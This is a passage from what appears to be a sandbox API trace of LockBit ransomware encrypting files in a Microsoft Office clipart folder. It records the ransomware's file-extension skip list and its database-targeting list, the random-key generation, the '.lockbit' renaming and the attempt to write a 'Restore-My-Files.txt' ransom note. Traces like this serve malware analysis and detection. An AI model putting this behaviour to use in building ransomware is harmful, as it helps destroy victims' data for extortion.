CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.200] malloc (_Size=0x40068) returned 0x3d70450 [0168.200] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=32184) returned 1 [0168.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0168.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0168.201] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0168.204] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.204] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.204] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.205] free (_Block=0x1fa2ed8) [0168.205] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01332U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.205] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.205] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.205] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa711900, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaa711900, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01478U.BMP", cAlternateFileName="")) returned 1 [0168.205] lstrcmpiW (lpString1=".", lpString2="PH01478U.BMP") returned -1 [0168.205] lstrcmpiW (lpString1="..", lpString2="PH01478U.BMP") returned -1 [0168.205] PathFindExtensionW (pszPath="PH01478U.BMP") returned=".BMP" [0168.205] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.205] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.205] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.206] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.206] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.206] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.206] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.207] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.207] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01478U.BMP") returned 1 [0168.207] lstrcmpiW (lpString1="ntldr", lpString2="PH01478U.BMP") returned -1 [0168.208] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01478U.BMP") returned -1 [0168.208] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01478U.BMP") returned -1 [0168.208] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01478U.BMP") returned -1 [0168.208] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01478U.BMP") returned 1 [0168.208] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01478U.BMP") returned -1 [0168.208] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.208] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP") returned=".BMP" [0168.208] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.208] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.208] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.209] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.209] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP.lockbit") returned 72 [0168.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01478u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0168.210] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.210] malloc (_Size=0x40068) returned 0x3f70048 [0168.210] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=31968) returned 1 [0168.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0168.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0168.211] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0168.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.215] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.215] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.215] free (_Block=0x1fa2ed8) [0168.215] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01478U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.215] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.216] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa47b3800, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa47b3800, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01562U.BMP", cAlternateFileName="")) returned 1 [0168.216] lstrcmpiW (lpString1=".", lpString2="PH01562U.BMP") returned -1 [0168.216] lstrcmpiW (lpString1="..", lpString2="PH01562U.BMP") returned -1 [0168.216] PathFindExtensionW (pszPath="PH01562U.BMP") returned=".BMP" [0168.216] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.216] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.216] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.216] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.216] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.217] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.217] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.217] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.218] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH01562U.BMP") returned 1 [0168.218] lstrcmpiW (lpString1="ntldr", lpString2="PH01562U.BMP") returned -1 [0168.218] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH01562U.BMP") returned -1 [0168.218] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH01562U.BMP") returned -1 [0168.218] lstrcmpiW (lpString1="autorun.inf", lpString2="PH01562U.BMP") returned -1 [0168.218] lstrcmpiW (lpString1="thumbs.db", lpString2="PH01562U.BMP") returned 1 [0168.219] lstrcmpiW (lpString1="iconcache.db", lpString2="PH01562U.BMP") returned -1 [0168.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP") returned=".BMP" [0168.219] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.219] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.219] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.220] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.220] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP.lockbit") returned 72 [0168.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph01562u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0168.225] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.225] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.225] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32184) returned 1 [0168.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.226] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.226] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.228] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.228] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.228] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.229] free (_Block=0x1fa2ed8) [0168.229] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH01562U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.229] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.229] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.230] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fb68400, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9fb68400, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH01607U.BMP", cAlternateFileName="")) returned 1 [0168.230] lstrcmpiW (lpString1=".", lpString2="PH01607U.BMP") returned -1 [0168.230] lstrcmpiW (lpString1="..", lpString2="PH01607U.BMP") returned -1 [0168.230] PathFindExtensionW (pszPath="PH01607U.BMP") returned=".BMP" [0168.230] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.230] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.230] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.230] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.230] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.231] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.231] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.231] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.231] 